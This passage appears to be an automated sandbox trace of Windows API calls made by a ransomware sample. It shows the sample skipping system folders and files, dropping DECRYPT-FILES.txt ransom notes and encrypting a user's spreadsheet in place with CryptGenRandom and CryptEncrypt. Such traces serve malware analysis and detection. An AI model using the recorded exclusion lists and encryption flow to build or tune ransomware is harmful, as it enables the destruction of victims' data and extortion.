HALPmcxz\\Documents\\My Shapes\\_private\\folder.ico.0uxB" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\my shapes\\_private\\folder.ico.0uxb"), dwFlags=0x0) returned 1 [0084.216] VirtualFree (lpAddress=0xfa0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.217] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.217] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.217] FindNextFileW (in: hFindFile=0x5f8b18, lpFindFileData=0x3f2ec58 | out: lpFindFileData=0x3f2ec58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xae5f45e0, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xae5f45e0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xae5f45e0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="jkbimi8.tmp", cAlternateFileName="")) returned 1 [0084.217] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="DECRYPT-FILES.txt") returned 1 [0084.217] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="autorun.inf") returned 1 [0084.217] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="boot.ini") returned 1 [0084.217] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="desktop.ini") returned 1 [0084.217] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="ntuser.dat") returned -1 [0084.217] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="iconcache.db") returned 1 [0084.217] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="bootsect.bak") returned 1 [0084.217] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="ntuser.dat.log") returned -1 [0084.217] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="thumbs.db") returned -1 [0084.217] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="Bootfont.bin") returned 1 [0084.217] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0084.217] lstrcmpiW (lpString1="tmp", lpString2="lnk") returned 1 [0084.217] lstrcmpiW (lpString1="tmp", lpString2="exe") returned 1 [0084.217] lstrcmpiW (lpString1="tmp", lpString2="sys") returned 1 [0084.217] lstrcmpiW (lpString1="tmp", lpString2="dll") returned 1 [0084.217] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\") returned 59 [0084.217] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0084.217] lstrcpyW (in: lpString1=0x3f2e428, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\" [0084.218] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\", lpString2="jkbimi8.tmp" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\jkbimi8.tmp") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\jkbimi8.tmp" [0084.218] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0084.218] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\jkbimi8.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\my shapes\\_private\\jkbimi8.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0084.218] CloseHandle (hObject=0x0) returned 0 [0084.218] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.218] FindNextFileW (in: hFindFile=0x5f8b18, lpFindFileData=0x3f2ec58 | out: lpFindFileData=0x3f2ec58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xae5f45e0, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xae5f45e0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xae5f45e0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="jkbimi8.tmp", cAlternateFileName="")) returned 0 [0084.218] FindClose (in: hFindFile=0x5f8b18 | out: hFindFile=0x5f8b18) returned 1 [0084.218] CloseHandle (hObject=0x428) returned 1 [0084.219] FindNextFileW (in: hFindFile=0x5f8c98, lpFindFileData=0x3f2eed4 | out: lpFindFileData=0x3f2eed4*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0x9ebad4e0, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0x9ebad4e0, ftLastAccessTime.dwHighDateTime=0x1d305ee, ftLastWriteTime.dwLowDateTime=0x9ebad4e0, ftLastWriteTime.dwHighDateTime=0x1d305ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="_private\\", cAlternateFileName="")) returned 0 [0084.219] FindClose (in: hFindFile=0x5f8c98 | out: hFindFile=0x5f8c98) returned 1 [0084.219] CloseHandle (hObject=0x410) returned 1 [0084.219] FindNextFileW (in: hFindFile=0x5f8b98, lpFindFileData=0x3f2f150 | out: lpFindFileData=0x3f2f150*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x290dda00, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x290dda00, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x290dda00, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Videos", cAlternateFileName="MYVIDE~1")) returned 1 [0084.219] lstrcmpW (lpString1="My Videos", lpString2=".") returned 1 [0084.219] lstrcmpW (lpString1="My Videos", lpString2="..") returned 1 [0084.219] lstrcatW (in: lpString1="My Videos", lpString2="\\" | out: lpString1="My Videos\\") returned="My Videos\\" [0084.219] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\", lpString2="My Videos\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Videos\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Videos\\" [0084.219] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Videos\\", lpSrch="\\Program Files") returned 0x0 [0084.219] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Videos\\", lpSrch=":\\Windows") returned 0x0 [0084.219] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Videos\\", lpSrch="\\Games\\") returned 0x0 [0084.219] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Videos\\", lpSrch="\\Tor Browser\\") returned 0x0 [0084.219] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Videos\\", lpSrch="\\ProgramData\\") returned 0x0 [0084.219] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Videos\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0084.219] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Videos\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0084.219] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Videos\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0084.219] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Videos\\", lpSrch="\\All Users") returned 0x0 [0084.219] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Videos\\", lpSrch="\\IETldCache\\") returned 0x0 [0084.219] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Videos\\", lpSrch="\\Local Settings\\") returned 0x0 [0084.219] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Videos\\", lpSrch="\\AppData\\Local") returned 0x0 [0084.219] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Videos\\", lpSrch="AhnLab") returned 0x0 [0084.219] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Videos\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0084.219] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Videos\\") returned 50 [0084.219] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0084.219] wsprintfW (in: param_1=0x3f2e6b4, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Videos\\\\jkbimi8.tmp") returned 62 [0084.219] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Videos\\\\jkbimi8.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\my videos\\jkbimi8.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x410 [0084.220] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Videos\\") returned 50 [0084.220] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0084.220] wsprintfW (in: param_1=0x3f2e6b4, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Videos\\\\DECRYPT-FILES.txt") returned 68 [0084.220] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Videos\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\my videos\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x414 [0084.220] WriteFile (in: hFile=0x414, lpBuffer=0xf70000*, nNumberOfBytesToWrite=0x23fc, lpNumberOfBytesWritten=0x3f2e6b0, lpOverlapped=0x0 | out: lpBuffer=0xf70000*, lpNumberOfBytesWritten=0x3f2e6b0*=0x23fc, lpOverlapped=0x0) returned 1 [0084.221] CloseHandle (hObject=0x414) returned 1 [0084.221] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Videos\\") returned 50 [0084.221] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Videos\\", lpString2="*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Videos\\*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Videos\\*" [0084.221] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Videos\\*", lpFindFileData=0x3f2eed4 | out: lpFindFileData=0x3f2eed4*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0x9ebad4e0, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0x9ebad4e0, ftLastAccessTime.dwHighDateTime=0x1d305ee, ftLastWriteTime.dwLowDateTime=0x9ebad4e0, ftLastWriteTime.dwHighDateTime=0x1d305ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="_private\\", cAlternateFileName="苟盅ꦌ썮ϲ")) returned 0xffffffff [0084.222] CloseHandle (hObject=0x410) returned 1 [0084.222] FindNextFileW (in: hFindFile=0x5f8b98, lpFindFileData=0x3f2f150 | out: lpFindFileData=0x3f2f150*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdfa02700, ftCreationTime.dwHighDateTime=0x1d556b2, ftLastAccessTime.dwLowDateTime=0x92278ec0, ftLastAccessTime.dwHighDateTime=0x1d5591c, ftLastWriteTime.dwLowDateTime=0x92278ec0, ftLastWriteTime.dwHighDateTime=0x1d5591c, nFileSizeHigh=0x0, nFileSizeLow=0xdfa5, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="OE QiY-.xlsx", cAlternateFileName="OEQIY-~1.XLS")) returned 1 [0084.222] lstrcmpiW (lpString1="OE QiY-.xlsx", lpString2="DECRYPT-FILES.txt") returned 1 [0084.222] lstrcmpiW (lpString1="OE QiY-.xlsx", lpString2="autorun.inf") returned 1 [0084.222] lstrcmpiW (lpString1="OE QiY-.xlsx", lpString2="boot.ini") returned 1 [0084.222] lstrcmpiW (lpString1="OE QiY-.xlsx", lpString2="desktop.ini") returned 1 [0084.222] lstrcmpiW (lpString1="OE QiY-.xlsx", lpString2="ntuser.dat") returned 1 [0084.222] lstrcmpiW (lpString1="OE QiY-.xlsx", lpString2="iconcache.db") returned 1 [0084.222] lstrcmpiW (lpString1="OE QiY-.xlsx", lpString2="bootsect.bak") returned 1 [0084.222] lstrcmpiW (lpString1="OE QiY-.xlsx", lpString2="ntuser.dat.log") returned 1 [0084.222] lstrcmpiW (lpString1="OE QiY-.xlsx", lpString2="thumbs.db") returned -1 [0084.222] lstrcmpiW (lpString1="OE QiY-.xlsx", lpString2="Bootfont.bin") returned 1 [0084.222] lstrlenW (lpString="OE QiY-.xlsx") returned 12 [0084.222] lstrcmpiW (lpString1="xlsx", lpString2="lnk") returned 1 [0084.222] lstrcmpiW (lpString1="xlsx", lpString2="exe") returned 1 [0084.222] lstrcmpiW (lpString1="xlsx", lpString2="sys") returned 1 [0084.222] lstrcmpiW (lpString1="xlsx", lpString2="dll") returned 1 [0084.222] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned 40 [0084.222] lstrlenW (lpString="OE QiY-.xlsx") returned 12 [0084.222] lstrcpyW (in: lpString1=0x3f2e920, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" [0084.222] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\", lpString2="OE QiY-.xlsx" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\OE QiY-.xlsx") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\OE QiY-.xlsx" [0084.222] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0084.222] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\OE QiY-.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\oe qiy-.xlsx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x410 [0084.223] GetFileSizeEx (in: hFile=0x410, lpFileSize=0x3f2e0e8 | out: lpFileSize=0x3f2e0e8*=57253) returned 1 [0084.223] CreateFileMappingW (hFile=0x410, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x414 [0084.223] MapViewOfFile (hFileMappingObject=0x414, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xfa0000 [0084.223] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x20, pbBuffer=0xf90000 | out: pbBuffer=0xf90000) returned 1 [0084.223] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x8, pbBuffer=0xf90020 | out: pbBuffer=0xf90020) returned 1 [0084.223] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0084.223] CryptEncrypt (in: hKey=0x5f8a98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfb0000*, pdwDataLen=0x3f2e050*=0x28, dwBufLen=0x100 | out: pbData=0xfb0000*, pdwDataLen=0x3f2e050*=0x100) returned 1 [0084.223] VirtualAlloc (lpAddress=0x0, dwSize=0x1001, flAllocationType=0x3000, flProtect=0x4) returned 0xfc0000 [0084.225] VirtualFree (lpAddress=0xfc0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.225] UnmapViewOfFile (lpBaseAddress=0xfa0000) returned 1 [0084.225] CloseHandle (hObject=0x414) returned 1 [0084.226] SetFilePointerEx (in: hFile=0x410, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0084.226] WriteFile (in: hFile=0x410, lpBuffer=0xfb0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x3f2e070, lpOverlapped=0x0 | out: lpBuffer=0xfb0000*, lpNumberOfBytesWritten=0x3f2e070*=0x108, lpOverlapped=0x0) returned 1 [0084.226] CloseHandle (hObject=0x0) returned 0 [0084.226] CloseHandle (hObject=0x410) returned 1 [0084.226] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.227] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.227] GetTickCount () returned 0x114d856 [0084.227] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0084.227] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0084.227] VirtualAlloc (lpAddress=0x0, dwSize=0xa, flAllocationType=0x3000, flProtect=0x4) returned 0xfa0000 [0084.228] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0084.228] lstrlenA (lpString="kernel32.dll") returned 12 [0084.228] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76c20000 [0084.228] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0084.228] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0084.228] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0084.228] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0084.228] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0084.228] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0084.228] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0084.228] lstrlenA (lpString="ADDATOMA") returned 8 [0084.228] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0084.228] lstrlenA (lpString="ADDATOMW") returned 8 [0084.228] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0084.228] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0084.228] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0084.228] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0084.228] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0084.228] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0084.228] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0084.228] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0084.228] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0084.228] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0084.229] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0084.229] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0084.229] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0084.229] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0084.229] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0084.229] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0084.229] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0084.229] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0084.229] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0084.229] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0084.229] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0084.229] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0084.229] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0084.229] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0084.229] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0084.229] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0084.229] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0084.229] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0084.229] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0084.229] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0084.229] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0084.229] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0084.229] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0084.229] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0084.229] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0084.229] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0084.229] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0084.229] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0084.229] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0084.229] lstrlenA (lpString="BACKUPREAD") returned 10 [0084.229] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0084.229] lstrlenA (lpString="BACKUPSEEK") returned 10 [0084.229] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0084.229] lstrlenA (lpString="BACKUPWRITE") returned 11 [0084.229] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0084.229] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0084.230] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0084.230] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0084.230] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0084.230] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0084.230] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0084.230] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0084.230] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0084.230] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0084.230] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0084.230] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0084.230] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0084.230] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0084.230] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0084.230] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0084.230] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0084.230] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0084.230] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0084.230] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0084.230] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0084.230] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0084.230] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0084.230] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0084.230] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0084.230] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0084.230] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0084.230] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0084.230] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0084.230] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0084.230] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0084.230] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0084.230] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0084.230] lstrlenA 